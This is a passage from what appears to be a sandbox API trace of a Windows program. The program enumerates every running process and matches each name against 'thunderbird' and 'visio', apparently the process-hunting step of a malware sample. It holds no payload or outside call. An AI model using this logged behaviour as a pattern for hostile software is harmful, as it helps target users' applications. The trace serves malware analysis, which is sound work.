(in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.072] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cbd0 [0100.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357cbd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.072] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.072] StrStrIA (lpFirst="conhost.exe", lpSrch="thunderbird") returned 0x0 [0100.072] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0100.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.074] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357cd38 [0100.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x357cd38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0100.074] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0100.074] StrStrIA (lpFirst="rxodge.exe", lpSrch="thunderbird") returned 0x0 [0100.074] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.075] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357ccf0 [0100.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x357ccf0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0100.075] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0100.075] StrStrIA (lpFirst="sppsvc.exe", lpSrch="thunderbird") returned 0x0 [0100.075] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0100.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.076] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357dfa8 [0100.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357dfa8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0100.076] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0100.076] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="thunderbird") returned 0x0 [0100.076] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0100.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.078] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357ce58 [0100.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x357ce58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0100.078] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0100.078] StrStrIA (lpFirst="TiWorker.exe", lpSrch="thunderbird") returned 0x0 [0100.078] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0100.078] CloseHandle (hObject=0x358) returned 1 [0100.079] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0100.098] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.099] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357dcc8 [0100.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357dcc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0100.099] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0100.099] StrStrIA (lpFirst="[System Process]", lpSrch="visio") returned 0x0 [0100.099] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0100.100] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574fe0 [0100.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574fe0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0100.101] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0100.101] StrStrIA (lpFirst="System", lpSrch="visio") returned 0x0 [0100.101] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.102] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357cc90 [0100.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x357cc90, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0100.102] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0100.102] StrStrIA (lpFirst="smss.exe", lpSrch="visio") returned 0x0 [0100.102] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.103] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357cca8 [0100.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357cca8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.103] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.104] StrStrIA (lpFirst="csrss.exe", lpSrch="visio") returned 0x0 [0100.104] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.105] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357ccd8 [0100.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x357ccd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0100.105] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0100.105] StrStrIA (lpFirst="wininit.exe", lpSrch="visio") returned 0x0 [0100.105] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.107] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357ce70 [0100.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357ce70, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.107] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.107] StrStrIA (lpFirst="csrss.exe", lpSrch="visio") returned 0x0 [0100.107] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.108] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cd80 [0100.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x357cd80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0100.108] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0100.108] StrStrIA (lpFirst="winlogon.exe", lpSrch="visio") returned 0x0 [0100.108] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.109] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cd98 [0100.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x357cd98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0100.110] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0100.110] StrStrIA (lpFirst="services.exe", lpSrch="visio") returned 0x0 [0100.110] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.111] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357cbb8 [0100.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x357cbb8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0100.111] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0100.111] StrStrIA (lpFirst="lsass.exe", lpSrch="visio") returned 0x0 [0100.111] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.134] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cc48 [0100.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cc48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.134] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.135] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.135] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.136] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357cd50 [0100.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357cd50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.136] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="visio") returned 0x0 [0100.136] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.138] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357cd08 [0100.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357cd08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.138] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="visio") returned 0x0 [0100.138] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.139] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cc18 [0100.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cc18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.139] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.139] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.140] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574ec0 [0100.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574ec0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0100.141] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0100.141] StrStrIA (lpFirst="dwm.exe", lpSrch="visio") returned 0x0 [0100.141] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.142] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cc60 [0100.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cc60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.142] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.142] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.143] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cd20 [0100.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cd20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.144] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.144] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.145] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cdb0 [0100.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cdb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.145] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.145] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.146] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cdc8 [0100.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cdc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.147] StrStrIA (lpFirst="svchost.exe", lpSrch="visio") returned 0x0 [0100.147] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, 